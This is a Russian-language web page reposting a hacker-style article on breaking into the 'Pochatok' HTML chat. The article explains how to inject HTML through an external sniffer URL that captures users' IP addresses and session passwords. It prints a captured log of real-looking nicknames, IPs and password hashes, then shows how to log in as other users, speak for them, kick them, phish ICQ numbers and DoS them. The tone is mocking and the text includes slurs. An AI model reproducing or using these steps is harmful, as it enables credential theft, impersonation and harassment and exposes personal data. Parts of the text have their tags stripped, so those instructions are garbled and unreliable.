Навигация
Главная
Поиск
Форум
FAQ's
Ссылки
Карта сайта
Чат программистов

Статьи
-Delphi
-C/C++
-Turbo Pascal
-Assembler
-Java/JS
-PHP
-Perl
-DHTML
-Prolog
-GPSS
-Сайтостроительство
-CMS: PHP Fusion
-Инвестирование

Файлы
-Для программистов
-Компонеты для Delphi
-Исходники на Delphi
-Исходники на C/C++
-Книги по Delphi
-Книги по С/С++
-Книги по JAVA/JS
-Книги по Basic/VB/.NET
-Книги по PHP/MySQL
-Книги по Assembler
-PHP Fusion MOD'ы
-by Kest
Professional Download System
Реклама
Услуги

Автоматическое добавление статей на сайты на Wordpress, Joomla, DLE
Заказать продвижение сайта
Программа для рисования блок-схем
Инженерный калькулятор онлайн
Таблица сложения онлайн
Популярные статьи
OpenGL и Delphi... 65535
Форум на вашем ... 65535
HACK F.A.Q 65535
Бип из системно... 65535
Гостевая книга ... 65535
Invision Power ... 65535
Содержание сайт... 65535
Организация зап... 65535
Вызов хранимых ... 65535
Программируемая... 65535
Эмулятор микроп... 65535
Подключение Mic... 65535
Создание потоко... 65535
Приложение «Про... 65535
Оператор выбора... 65535
Создание отчето... 65425
Модуль Forms 65187
Пример работы с... 64352
ТЕХНОЛОГИИ ДОСТ... 61834
Имитационное мо... 57755
Реклама
Сейчас на сайте
Гостей: 7
На сайте нет зарегистрированных пользователей

Пользователей: 13,085
новичок: nikita222dolban
Новости
Реклама
Выполняем курсовые и лабораторные по разным языкам программирования
Подробнее - курсовые и лабораторные на заказ
Delphi, Turbo Pascal, Assembler, C, C++, C#, Visual Basic, Java, GPSS, Prolog, 3D MAX, Компас 3D
Заказать программу для Windows Mobile, Symbian

Изменения контуров и сортировка в двумерном массиве чисел на Turbo Pasca...
Моделирование интернет магазина (Apache, Php, Html) на GPSS + Блок схема
Метод половинного деления для нахождения корня уровнения на Turbo Pascal...

Реклама



Подписывайся на YouTube канал о программировании, что бы не пропустить новые видео!

ПОДПИСЫВАЙСЯ на канал о программировании
Дырки в безопасности чатов
Ты, конечно же, в курсе, что многие чаты на www далеки от совершенства. Нет, ну конечно, у них там есть всякие фенечки, всякие картиночки, рисуночки и прочая фигня, но вот защита там частенько просто отсутствует. Таких чатов полно, поэтому мы решили взять первый попавшийся из них и описать способы взлома. Системным администраторам этого чата Х советует еще раз проверить, что они там наконфигурили, и заткнуть все описываемые ниже дырки. Чат находится по адресу www.chat.orc.ru.
Будь готов - всегда готов
Когда нефига делать, то можно залезть и поприкалываться в html-чатах. Там, как правило, сидят ламеры и уроды, а также люди, которые только зашли в Инет. Прикалываться можно по разному: вставляя нецензурную брань, неприличные картинки, java-скрипты и прочие пакости. Чат "Початок" представляет стандартный, но немного переделанный свободно распространяемый чат "Chat Machine". В нем, якобы, запрещено вставлять html-теги, но мы это исправим. Размер и цвет шрифтов, которые определил админ, мы тоже исправим, как и скрытие IP других юзеров.
Как менять установки шрифта
Сохраняем то окно, где находятся установки (цвет, размер), открываем текстовым редактором и ищем следующую строчку Красный. Вместо слова Red можно подставить любое название цвета, ведь по умолчанию можно выбирать только цвета, установленные админом. :)
Находим поле Большой. Разве "+2" это большой шрифт? :) Нет, так дело не пойдет, пишем "+5".
Как вставлять теги
Находим стоку Красный. Берем и изменяем его следующим образом: Красный. Не закрываем тэг (потому что он и так закроется) и после название цвета закрываем тэг. Пишем любое сообщение, и тем самым получается, что чатлане видят не совсем пристойную картинку. :)
Таким образом можно ставить любой тэг типа Красный, и чат начинает "летать" :).
Как войти в чат под другим зарегистрированным пользователем и узнать их IP адреса
Находим строчку Красный и, используя всем известный синффер html чатов, получаем IP участников чата и их пароли. Делается это следующим образом: http://www.hackzone.ru/cgi-bin/sniff.cgi?satan">Красный. Далее пишем какое-либо сообщение, видим картинку HackZone и смотрим лог по адресу http://www.hackzone.ru/files/snifflog.txt. В нем мы видим следующее:
[Tue 3:03pm] (id) 195.210.130.46 d046.p1.col.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=YURIK&passwd=31ZUlukFqoI5c&custom1=on]
[Tue 3:03pm] (id) 212.15.128.4 dobbin.eurocom.od.ua 212.15.128.42 [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=afrodita&passwd=480/SYC8r5W3U&custom1=on]
[Tue 3:03pm] (id) 129.132.26.41 ilea1.ethz.ch [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Monach&passwd=49aiRPRMobjZ6&custom1=on]
[Tue 3:03pm] (id) 195.2.78.163 p163.n78.dip.aha.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Patron25&passwd=13ttx6i7zWwkk&custom1=on]
[Tue 3:03pm] (id) 199.203.4.5 customer.netvision.net.il 207.232.23.220,194.90.119.123 [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=_RENAT__&passwd=315ybDkg5YM22&custom1=on]
[Tue 3:03pm] (id) 193.232.119.130 ns.misa.ac.ru 192.168.12.133 [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Dasha&passwd=27tQONxBHE612&custom1=on]
[Tue 3:03pm] (id) 195.210.130.46 d046.p1.col.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=YURIK&passwd=31ZUlukFqoI5c&custom1=on]
[Tue 3:03pm] (id) 195.91.140.77 ppp666.nigger.is.satan.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Satan&passwd=40xtEwTiIfRQI&custom1=on]
[Tue 3:03pm] (id) 195.2.78.163 p163.n78.dip.aha.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Patron25&passwd=13ttx6i7zWwkk&custom1=on]
[Tue 3:02pm] (id) 195.34.28.213 dialup-28213.dialup.ptt.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=_GUN_&passwd=13/hfDaaKZEeg&custom1=on]
Вот они все на ладони :).
Если надо, запингуем кого-нибудь со всех шеллов, а особых уродов заДоСим чем-нибудь типа kod.c или pimp.c.
Как хакеры втираются в доверие
Теперь можно зайти под любым пользователем, который находится в чате, не зная его пароль. Выбираем, например, доброго GUN'a, который уже 2 года в этом чате сидит и которому все доверяют. :) Копируем его строку и вставляем в браузер: http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=_GUN_&passwd=13/hfDaaKZEeg&custom1=on.
Вуаля! Мы зашли под ним в чат, и теперь, сославшись на потерю памяти, можно выведать у всех пользователей ICQ номера, дать чего надо и наслаждаться жизнью. :)
Не забудь, что после каждого изменения твоего файла с установками его нужно сохранять и нажимать кнопку применить.
Исходник снифера можно взять по адресу http://www.hackzone.ru/files/sniff.txt и изменить, чтобы не показывалась картинка, а то особо мудрые совы могут что-то заподозрить.
Очень много людей знают про хакзоновский сниффер, так что можно воспользоваться нашим: http://phorce.virtualave.net/cgi-bin/sniffer.cgi, лог-файл: http://phorce.virtualave.net/cgi-bin/fuck.log.
Как говорить от других имен
Узнав шифрованный пароль того кого нужно с помощью сниффера, сохраняем то окно, где нужно писать текст, и вставляем вместо своего ника чужой (и пароль, конечно), и пишем чего душе угодно!
Как выкидывать из чата
Опять же, получив шифрованный пароль в документе с настройками, сохраненном на нашем диске, в самом низу вставляем вместо своего ника и пароля - чужие. Сохраняем, открываем, жмем выход, затем видим сообщение, что Вася Пупкин покинул чат. :)
Как защититься от сниффера
Это очень просто. Залезаем в установки броузера и вырубаем показ картинок.
Опубликовал Kest October 26 2008 16:27:23 · 1 Комментариев · 7009 Прочтений · Для печати

• Не нашли ответ на свой вопрос? Тогда задайте вопрос в комментариях или на форуме! •


Комментарии
ibragim December 24 2011 07:42:28
airwayfun.com
Добавить комментарий
Имя:



smiley smiley smiley smiley smiley smiley smiley smiley smiley
Запретить смайлики в комментариях

Введите проверочный код:* =
Рейтинги
Рейтинг доступен только для пользователей.

Пожалуйста, залогиньтесь или зарегистрируйтесь для голосования.

Нет данных для оценки.
Гость
Имя

Пароль



Вы не зарегистрированны?
Нажмите здесь для регистрации.

Забыли пароль?
Запросите новый здесь.
Поделиться ссылкой
Фолловь меня в Твиттере! • Смотрите канал о путешествияхКак приготовить мидии в тайланде?
Загрузки
Новые загрузки
iChat v.7.0 Final...
iComm v.6.1 - выв...
Visual Studio 200...
CodeGear RAD Stud...
Шаблон для новост...

Случайные загрузки
БД студентов
Animated Menus
AUTOWEB
В.Понамарев - COM...
Delphi. Готовые а...
Создание отчетов ...
IconCut [Исходник...
Расширенный загру...
AlnComponents
Время загрузки ...
Мониторинг сервер...
PHP5. Профессиона...
Animation Effect ...
Открытие Cd-ROM'a...
39 статьи по Delphi
PHP 5
Программирование ...
База для Allsubmi...
Adapter (пример D...
CoolDev TipsSyste...

Топ загрузок
Приложение Клие... 100469
Delphi 7 Enterp... 87052
Converter AMR<-... 20078
GPSS World Stud... 12819
Borland C++Buil... 11831
Borland Delphi ... 8603
Turbo Pascal fo... 7039
Visual Studio 2... 4999
Калькулятор [Ис... 4799
FreeSMS v1.3.1 3542
Случайные статьи
Duplicate unit name
Модифицированный д...
Основы архитектуры VM
Множество данных м...
Процедура обратног...
Блоки работы с гру...
Чем заменить перек...
Изготовление метал...
10-17)
2.1.1. Константы
Возможности окружения
Где почта России п...
Программирование а...
Ввод-вывод на прим...
Связи графической ...
Шаблоны для Joomla
О кликабельной инф...
Считывание текущег...
No inherited metho...
СПОСОБЫ РАСПОЗНАВА...
Инструментарий для...
Интеграция и персп...
Таблицы (Table)
присвоения чрезмер...
Символьные SQL-ф...
Статистика



Друзья сайта
Программы, игры


Полезно
В какую объединенную сеть входит классовая сеть? Суммирование маршрутов Занимают ли таблицы память маршрутизатора?